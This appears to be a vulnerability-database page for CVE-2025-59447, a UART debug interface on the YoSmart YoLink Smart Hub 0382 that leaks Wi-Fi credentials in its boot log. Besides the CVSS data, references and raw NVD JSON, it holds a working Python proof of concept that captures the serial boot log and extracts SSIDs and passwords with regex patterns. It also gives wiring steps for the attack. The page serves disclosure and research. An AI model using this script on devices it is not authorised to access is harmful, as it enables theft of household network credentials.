CVE-2025-59447

Description

The YoSmart YoLink Smart Hub device 0382 exposes a UART debug interface. An attacker with direct physical access can leverage this interface to read a boot log, which includes network access credentials.

CVSS Details

CVSS Score

2.2

Severity

LOW

CVSS Vector

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

YoSmart YoLink Smart Hub 0382

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-59447 - YoSmart YoLink Smart Hub UART Debug Interface Credential Disclosure
PoC for reading boot log from exposed UART debug interface to extract network credentials.

Requirements:
  - USB-to-TTL serial adapter (e.g., CP2102, FTDI FT232RL)
  - Physical access to YoSmart YoLink Smart Hub 0382
  - pyserial library (pip install pyserial)

Usage:
  1. Disassemble the YoLink Smart Hub to expose the PCB
  2. Identify UART test points (TX, RX, GND) on the board
  3. Connect USB-to-TTL adapter: TX->RX, RX->TX, GND->GND
  4. Run: python3 cve-2025-59447_poc.py /dev/ttyUSB0
"""

import serial
import sys
import re
import time

def read_boot_log(serial_port, baudrate=115200, timeout=30):
    """Connect to UART and capture boot log output."""
    try:
        ser = serial.Serial(
            port=serial_port,
            baudrate=baudrate,
            bytesize=serial.EIGHTBITS,
            parity=serial.PARITY_NONE,
            stopbits=serial.STOPBITS_ONE,
            timeout=timeout
        )
        print(f"[*] Connected to {serial_port} at {baudrate} baud")
        print("[*] Waiting for boot log output (power cycle the device if needed)...")

        boot_log = ""
        start_time = time.time()
        while time.time() - start_time < timeout:
            if ser.in_waiting > 0:
                data = ser.read(ser.in_waiting).decode('utf-8', errors='ignore')
                boot_log += data
                print(data, end='', flush=True)

        ser.close()
        return boot_log
    except serial.SerialException as e:
        print(f"[!] Serial error: {e}")
        return None

def extract_credentials(boot_log):
    """Extract network credentials from boot log."""
    credentials = {}

    # Common patterns for Wi-Fi credentials in boot logs
    ssid_patterns = [
        r'SSID[\s:=]+([\w\-\.\s]+)',
        r'wifi[\s_]*ssid[\s:=]+([\w\-\.\s]+)',
        r'wlan[\s_]*ssid[\s:=]+([\w\-\.\s]+)',
    ]
    passwd_patterns = [
        r'(?:password|passwd|passphrase|pwd|psk)[\s:=]+([\S]+)',
        r'wifi[\s_]*(?:password|passwd|passphrase|pwd|psk)[\s:=]+([\S]+)',
        r'wlan[\s_]*(?:password|passwd|passphrase|pwd|psk)[\s:=]+([\S]+)',
    ]

    for pattern in ssid_patterns:
        match = re.search(pattern, boot_log, re.IGNORECASE)
        if match:
            credentials['ssid'] = match.group(1).strip()
            break

    for pattern in passwd_patterns:
        match = re.search(pattern, boot_log, re.IGNORECASE)
        if match:
            credentials['password'] = match.group(1).strip()
            break

    return credentials

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <serial_port> [baudrate]")
        print(f"Example: {sys.argv[0]} /dev/ttyUSB0 115200")
        sys.exit(1)

    port = sys.argv[1]
    baud = int(sys.argv[2]) if len(sys.argv) > 2 else 115200

    print("=" * 60)
    print("CVE-2025-59447 - YoLink Smart Hub UART Credential Leak PoC")
    print("=" * 60)

    log = read_boot_log(port, baud)
    if log:
        print("\n[*] Extracting credentials from boot log...")
        creds = extract_credentials(log)
        if creds:
            print(f"\n[!] Extracted Credentials:")
            for key, value in creds.items():
                print(f"    {key}: {value}")
        else:
            print("[!] No credentials found in boot log")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59447
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59447
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59447/
[4] VulDB https://vuldb.com/cve/CVE-2025-59447
[5] https://bishopfox.com/blog/advisories
[6] https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home
[7] https://shop.yosmart.com/pages/product-support

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59447", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.030", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink Smart Hub device 0382 exposes a UART debug interface. An attacker with direct physical access can leverage this interface to read a boot log, which includes network access credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}]}}